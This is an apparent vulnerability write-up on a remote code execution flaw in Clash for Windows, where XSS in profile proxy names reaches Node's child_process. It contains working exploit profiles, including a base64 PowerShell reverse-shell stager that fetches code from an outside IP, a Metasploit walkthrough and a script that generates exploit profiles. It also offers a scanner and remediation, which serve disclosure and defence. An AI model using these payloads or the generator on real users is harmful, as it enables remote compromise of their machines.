
Clash Remote Code Execution Vulnerability

Author: 网络安全菜鸟

0x01 Vulnerability Description

Clash is a rule-based, cross-platform proxy core written in Go. Clash for Windows is a graphical Clash variant that runs on Windows; it configures and controls the Clash core through the Clash API so that users can operate it visually.

Download link

https://github.com/Fndroid/clash_for_windows_pkg/releases

The latest version at the time of writing is v0.20.12.

Clash for Windows is vulnerable to remote command execution when it subscribes to a malicious link. The proxy rule configuration file is not strictly validated, so an attacker can craft an XSS payload in the proxy configuration and execute arbitrary JavaScript; because that JavaScript runs in a renderer that can reach Node's child_process, it amounts to arbitrary command execution.

0x02 Impact

Affected versions: < v0.20.12

Operating system: Windows x64

System version: Windows 11

Risk level: High

0x03 Reproduction

This reproduction uses v0.18.8 on Windows 10.

Create a file named poc.yaml with the following content:

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true
proxy-groups:
  - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
      - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

Open Clash, go to Profiles, click Import and import the poc.yaml file just created.

Click the imported profile to switch to it.

When switching nodes, the calculator pops up, which confirms that the payload executed.

Getting a Metasploit session

Start msf and search for the web_delivery module.

Use the exploit/multi/script/web_delivery module.

Set lhost:

set lhost <attacker IP>

Set the target (the PSH target; the stager msf generates for it is the PowerShell one-liner shown below).

Set the payload.

Run the module to generate the reverse-shell stager, which msf prints as a one-liner:

powershell.exe -nop -w hidden -e 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

Building the exploit profile

The base64 string placed in the onerror handler decodes to the web_delivery one-liner wrapped in a Node child_process call, i.e. const tenet = require('child_process').exec('powershell.exe -nop -w hidden -e ...'); inside the renderer, new Buffer(..., 'base64').toString() recovers that source and eval() runs it. The profile is otherwise identical to poc.yaml:

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror='eval(new Buffer(`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`,`base64`).toString())'>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true
proxy-groups:
  - name: <img/src="1"/onerror='eval(new Buffer(`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`,`base64`).toString())'>
    type: select
    proxies:
      - a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
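The exploit profile above is produced from the web_delivery one-liner by wrapping it in a child_process call, base64-encoding that source and placing it in the onerror handler. The following Node script is an added example, not code from the post or from Clash for Windows, that performs that encoding step for an arbitrary command and emits a profile in the same layout; STAGER is a constructed placeholder standing in for the msf-generated one-liner, and the function names are the author's own.

```javascript
"use strict";
// Added example, not code from the post or from Clash for Windows. Rebuilds
// the exploit profile from a command string: the command is wrapped in the
// same child_process call the post's base64 decodes to, that source is
// base64-encoded, and the result is placed in the img/onerror handler of the
// proxy name, the group name and the group's proxy reference.

// Constructed placeholder for the msf web_delivery one-liner; not a real stager.
const STAGER = "powershell.exe -nop -w hidden -e QQBCAEMA";

// JavaScript that eval() will run inside the renderer. The command sits in a
// single-quoted literal, so backslashes and single quotes must be escaped or
// the wrapper would not parse.
function wrapCommand(cmd) {
  const escaped = cmd.replace(/\\/g, "\\\\").replace(/'/g, "\\'");
  return `const tenet = require('child_process').exec('${escaped}');`;
}

// Proxy/group name: an <img> whose failing load fires onerror, which decodes
// and evals the wrapper. new Buffer is deprecated in current Node but still
// present, which is why the post can use it. Base64 cannot contain ' or >,
// so the single-quoted attribute and the tag close stay intact.
function buildPayloadName(cmd, prefix = "a") {
  const b64 = Buffer.from(wrapCommand(cmd), "utf8").toString("base64");
  return `${prefix}<img/src="1"/onerror='eval(new Buffer(\`${b64}\`,\`base64\`).toString())'>`;
}

// Full profile in the layout of the post's exp YAML: the proxy is named with
// the "a" prefix, the group without it, and the group references the proxy.
function buildProfile(cmd) {
  const proxyName = buildPayloadName(cmd, "a");
  const groupName = buildPayloadName(cmd, "");
  return [
    "port: 7890",
    "socks-port: 7891",
    "allow-lan: true",
    "mode: Rule",
    "log-level: info",
    "external-controller: :9090",
    "proxies:",
    `  - name: ${proxyName}`,
    "    type: socks5",
    "    server: 127.0.0.1",
    '    port: "17938"',
    "    skip-cert-verify: true",
    "  - name: abc",
    "    type: socks5",
    "    server: 127.0.0.1",
    '    port: "8088"',
    "    skip-cert-verify: true",
    "proxy-groups:",
    `  - name: ${groupName}`,
    "    type: select",
    "    proxies:",
    `      - ${proxyName}`,
    "",
  ].join("\n");
}

console.log(buildProfile(STAGER));
```

Redirecting the output to a file gives a profile that can be imported the same way as the one above; replacing STAGER with the real one-liner reproduces the post's exp.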

Place the exploit profile in the root directory of the attacker machine (Kali).

Import it in Clash.

Click the imported profile to switch to it.

When switching nodes, the session checks in to msf.

0x04 Vulnerability Analysis

Clash for Windows is built on Electron. The product does not strictly validate the proxy rule configuration file, so an attacker can put an XSS payload in the proxy configuration and execute arbitrary JavaScript; because the renderer exposes Node's require(), that JavaScript can spawn processes.

The name field of an entry in "proxies" embeds an HTML tag; the image source never resolves, so the onerror handler fires and runs the statement:

- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
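To make the mechanism concrete, here is an added example that is not Clash for Windows source: the rendering pattern that turns a proxy name into live markup, the escaped form that fixes it, and a small scanner over a parsed profile that reports names carrying an event-handler attribute and decodes the base64 variant so the underlying command is visible. The profile object is constructed to mirror poc.yaml (plus one base64-style entry), the function names are the author's own, and since the script runs in plain Node the innerHTML assignment is described in a comment rather than performed.

```javascript
"use strict";
// Added example, not Clash for Windows source. Shows the rendering mistake
// that turns a proxy name into live markup, the escaped form that fixes it,
// and a scanner over a parsed profile that reports names carrying an event
// handler. Runs under plain Node: the innerHTML assignment is only described.

// Vulnerable pattern: the name is concatenated into markup that is then
// assigned to innerHTML, so '<img ... onerror=...>' inside the name becomes a
// real element whose handler runs with Node integration (require() reachable).
function renderNameUnsafe(name) {
  return `<div class="proxy">${name}</div>`; // destined for element.innerHTML
}

// Fix: escape the HTML-significant characters (equivalently, assign the name
// to textContent, which never parses markup) so the name is shown literally.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderNameSafe(name) {
  return `<div class="proxy">${escapeHtml(name)}</div>`;
}

// Markup in a proxy or group name is never legitimate. Flag a tag start that
// carries an on*= attribute, and decode base64 handed to eval() so the reader
// sees the command rather than the wrapper.
const HANDLER_RE = /<[a-z][^>]*\bon[a-z]+\s*=/i;
const B64_EVAL_RE = /new Buffer\(`([A-Za-z0-9+/=]+)`,`base64`\)/;

function scanProfile(profile) {
  const findings = [];
  const check = (where, name) => {
    if (typeof name !== "string" || !HANDLER_RE.test(name)) return;
    const m = B64_EVAL_RE.exec(name);
    findings.push({
      where,
      name,
      decoded: m ? Buffer.from(m[1], "base64").toString("utf8") : null,
    });
  };
  (profile.proxies || []).forEach((p, i) => check(`proxies[${i}].name`, p.name));
  (profile["proxy-groups"] || []).forEach((g, i) => {
    check(`proxy-groups[${i}].name`, g.name);
    (g.proxies || []).forEach((n, j) => check(`proxy-groups[${i}].proxies[${j}]`, n));
  });
  return findings;
}

// Constructed sample: poc.yaml as a YAML parser would return it, plus one
// proxy using the base64 variant from the exploit profile.
const CALC_NAME = 'a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>';
const WRAPPED_JS = "require('child_process').exec('calc.exe');";
const B64_NAME = `a<img/src="1"/onerror='eval(new Buffer(\`${Buffer.from(WRAPPED_JS).toString("base64")}\`,\`base64\`).toString())'>`;
const SAMPLE_PROFILE = {
  port: 7890,
  proxies: [
    { name: CALC_NAME, type: "socks5", server: "127.0.0.1", port: "17938" },
    { name: B64_NAME, type: "socks5", server: "127.0.0.1", port: "17939" },
    { name: "abc", type: "socks5", server: "127.0.0.1", port: "8088" },
  ],
  "proxy-groups": [{ name: "select-group", type: "select", proxies: [CALC_NAME, "abc"] }],
};

for (const f of scanProfile(SAMPLE_PROFILE)) {
  console.log(`${f.where}: ${f.decoded || f.name}`);
}
```

The scanner is a triage aid for a profile obtained from a subscription URL before it is imported; it catches the two forms used in this post, not every possible encoding, which is why the application-side fix is escaping on output rather than filtering on input.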

The configuration can also be delivered by local import of the YAML file.

Another vector is the browser prompt: a clash:// link makes Clash for Windows fetch and install a configuration from the given URL.

clash://install-config?url=http://ip:port/eval.txt&name=RCE

0x05 Remediation

Upgrade to the latest version.

Since the root cause is that untrusted strings from the profile are rendered as HTML in an Electron renderer that can reach Node, the application-side fix is to render proxy and group names as text rather than markup, and to keep nodeIntegration off and contextIsolation on so that a stray XSS cannot reach require(). On the user side, treat subscription URLs and clash:// install links as untrusted input and inspect a profile for markup in its names before importing it.

0x06 References

https://github.com/Fndroid/clash_for_windows_pkg/issues/2710

https://blog.csdn.net/WEARE001/article/details/123146639

https://mp.weixin.qq.com/s/-jmAXSWOpncnLCWFEAiVgQ
